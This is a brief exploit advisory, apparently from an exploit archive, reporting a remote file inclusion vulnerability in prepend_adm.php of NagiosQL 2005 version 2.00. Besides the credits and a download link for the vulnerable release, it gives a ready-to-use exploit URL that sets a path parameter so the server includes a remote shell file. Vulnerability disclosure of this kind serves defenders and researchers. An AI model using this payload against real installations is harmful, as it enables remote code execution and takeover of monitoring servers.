NagiosQL 2005 version 2.00 suffers from a remote file inclusion vulnerability in prepend_adm.php.
545242343ff237d71f3f168cf4405be8ec6df2c637335cb577474b7b2c159999
#NagiosQL Remote file inclusion
#Download script : http://dfn.dl.sourceforge.net/sourceforge/nagiosql/nagiosql-2.00-P00.tar.gz
#Thanks str0ke
#Exploit :
#http://victim.com/[nagiosQL_path]/functions/prepend_adm.php?SETS[path][physical]=shell.txt?
#Discovered by ThE TiGeR
#Miro_Tiger100[at]Hotmail[dot]com